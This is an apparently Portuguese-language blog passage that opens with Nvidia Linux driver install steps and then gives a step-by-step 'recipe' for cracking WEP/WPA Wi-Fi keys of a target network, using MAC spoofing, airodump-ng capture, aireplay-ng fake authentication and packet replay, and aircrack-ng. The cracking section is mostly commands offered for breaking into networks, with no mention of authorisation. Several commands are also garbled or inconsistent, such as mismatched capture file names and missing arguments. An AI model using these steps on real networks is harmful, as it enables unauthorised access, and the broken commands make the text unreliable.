2. Depois de baixar o driver do site da Nvidia, de um CTRL + ALT + F1 … aperte CRTL + C se ele nao aprar o que estiver fazendo. Agora digite eses comandos abaixo:

#echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf
#update-initramfs -u

3. Reboot.

4. Change to init 3

#init 3

5. Install the NVIDIA driver

#sh NVIDIA-XXXXXX.run

Prontinho. Seja feliz!

Descriptar wep,wap com airodump-ng,aireplay-ng,aircrack-ng

Texto do Juan Carlos Cunha

Vejo em muitos blogs, pessoas tendo dificuldades para descriptar uma rede wirelless com chave WEP,WAP.

Vou dar uma receita de bolo aqui. Aqueles que são Script kiddies irão gostar, mas aqueles que querem realmente aprender: eu aconcelho a estudar, pois isso não é muito difícil, até fuçando você aprende.

Mas vamos ao que intereça.

Vou apresentar para vocês 4 programas que ajudan e auxiliam na descriptaçao da senha.

Airodump-ng, aireplay-ng, aircrack-ng, airmon-ng(nao usaremos, mas é bom voces pesquisarem um pouco sobre ele tambem).

Eu estou usando linux galera.

1º – ifconfig wlan() down //iremos definir uma conexão para a rede

2º – macchanger -m 00:11:22:33:44:55 wlan0 //definer uma MAC para a “wlan0”

3º – ifconfig wlan0 up //agora vamos fazer a wlan0 subir(definitivamente)

4º – airodump-ng wlan0 //Irá fazer com que pegue pacotes de todas as redes ativas, daí então você escolhe a rede que você quer si conectar, pegando o nome da autenticação que na maioria das vezes ficam no lado direito da tela do console. Assim que pegar a autenticação, dê um ctrl+c ou z para parar o recebimento dos pacotes.

5º – airodump-ng wlan0 -w autenticacao -c 8

Neste 5 passo, o seu computador irá capturar pacotes do alvo.

OBS: não pare o processo!

————————–Essa é a segunda etapa ——————————-

Abra uma nova janela do console do linux e vamos para a segunda etapa.

Nesta segunda etapa iremos acelerar o recebimento de pacotes com o aireplay-ng

1º – aireplay-ng -1 0 -e nome_da_rede_alvo –a //o nome da rede, você poderá obte-lo na primeira etapa.

2º – aireplay-ng -1 0 -e nome_da_rede_alvo -a 00:11:22:33:44:55 -h wlan0

3º – aireplay-ng -3 -b 00:11:22:33:44:55 -h wlan0 //acelerando captura de pacotes

Neste 3 passo, o seu computador irá acelerar a transmissão dos pacotes pacotes

OBS: não pare o processo!

————————–Essa é a terceira etapa——————————-

ABRA uma outra janela do console do linux e vamos para a terceira e ultima etapa da receita.

Espere alguns minutos(5 min), depois de acelerar os pacotes

1º – aircrack-ng teste.cap